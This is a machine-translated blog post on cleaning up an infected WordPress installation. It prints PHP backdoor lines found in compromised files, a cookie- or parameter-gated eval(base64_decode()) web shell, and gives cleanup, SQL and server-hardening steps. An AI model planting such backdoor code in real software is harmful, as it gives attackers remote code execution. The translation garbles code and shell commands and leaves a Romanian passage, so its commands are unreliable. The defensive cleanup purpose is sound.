WordPress Exploit – Virustiedostojen puhdistus, SQL- ja palvelinsuojaus.
Ennen kuin luet tämän postauksen, sinun täytyy nähdä postaus täällä, ymmärtääkseen jotain. :)
Löysin useista stealthsettings.com-sivuston blogien tiedostoista alla olevien kaltaisia koodeja, jotka ilmestyivät tartunnan seurauksena WordPressin hyödyntäminen.:
<?php if($_GET['573abcb060974771']==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST['tiedosto'])); poistua; } ?>
ja
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['tiedosto'])); poistua; } ?>
Yllä olevassa tapauksessa kyse on tiedostosta xmlrpc.php niistä Unelias, mutta yhdellä grep palvelimella voidaan nähdä, että lähteissä on melko paljon tällaisia koodeja.

Tartunnan saaneiden tiedostojen puhdistaminen:
Oooookkkk…
1. Paras ratkaisu, kun se on tehty varmuuskopio- ja puhdistanut tietokannan, se on sa POISTAA tiedostot WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.
Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.
./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['tiedosto'])); poistua; } ?><?php get_header(); ?>
2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.
find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”
find . -name “wp-info.txt”
3. in /tmp , etsi ja poista kansioita, kuten tmpYwbzT2
SQL-siivous -
1. taulukossa taulukko wp_options katso onko se olemassa ja poista rivit: sisäinen_linkkien_välimuisti, rss_f541b3abd05e7962fcab37737f40fad8 ja wordpress_optiot.
2. Siirry myös kohtaan wp_options Active_plugins ja poista, jos sellainen on, laajennus, joka päättyy johonkin laajennuksista *_new.php, *_old.php, *.jpgg, *.giff, *.pngg tai jos kyseessä on toinen epäilyttävä laajennus, tarkista huolellisesti.
3. Taulukossa wp_users, katso, onko sarakkeessa käyttäjää, jonka oikealle puolelle ei ole kirjoitettu mitään user_nicename. Poista tämä käyttäjä, mutta muista ID-sarakkeen numero. Tämä käyttäjä todennäköisesti käyttää "WordPressiä" nimellä user_login ja näyttää siltä, että se luotiin päivämääränä 00:00:00 0000-00-00.
4. Mene pöytään wp_usermeta ja poista kaikki rivit, jotka kuuluvat yllä olevaan tunnukseen.
Kun olet tehnyt tämän sql-puhdistuksen, deaktivoi ja aktivoi sitten jokin laajennus. (blogissa -> Kojelauta -> laajennukset)
Palvelimen suojaus:
1. Katso mitkä hakemistot ja tiedostot ovat "kirjoitettava” (chmod 777) ja yritä laittaa a chmod joka ei enää salli heidän kirjoittamista millään tasolla. (esim. chmod 644)
löytää. -perm -2 -ls
2. Katso mitkä tiedostot asettavat bitin etelään tai liukua . Jos et käytä näitä tiedostoja, laita ne chmod 0 tai poista ne sisältävä paketti. He ovat erittäin vaarallisia, koska he teloittavat etuoikeuksilla "ryhmä"Tai"juurtua" eikä sitä tiedostoa suorittavan tavallisen käyttäjän oikeuksilla.
etsi / -tyyppi f -perm -04000 -ls
etsi / -tyyppi f -perm -02000 -ls
3. Tarkista, mitkä portit ovat auki ja yritä sulkea tai suojata portit, jotka eivät ole käytössä.
netstat -an | grep -i lista
Siinä se. Minä näen sen jotkut blogit on kielletty Google-haussa ja muut sanovat "Hyvin tehty!!!" . No, olisin tehnyt sen heidän puolestaan...mutta mitä sanot, jos Google alkaa kieltää kaikki sivustot jotka tekevät LÄHTÄN roskapostia ja pakkaa troijalaisia (Trojan.Clicker.HTML) evästeissä?
WordPress Exploit – Virustiedostojen puhdistus, SQL- ja palvelinsuojaus.
Mitä uutta
Noin Stealth
Teknologiasta intohimoinen, kirjoitan mielelläni StealthSettings.com-sivustolla vuodesta 2006 lähtien. Minulla on laaja kokemus käyttöjärjestelmistä: macOS, Windows ja Linux, sekä ohjelmointikielistä ja blogialustoista (WordPress) sekä verkkokaupoista (WooCommerce, Magento, PrestaShop).
Näytä kaikki Stealthin viestitSaatat olla kiinnostunut myös...
Yksi ajatus “WordPress Exploit – Virustiedostojen puhdistus, SQL- ja palvelinsuojaus.”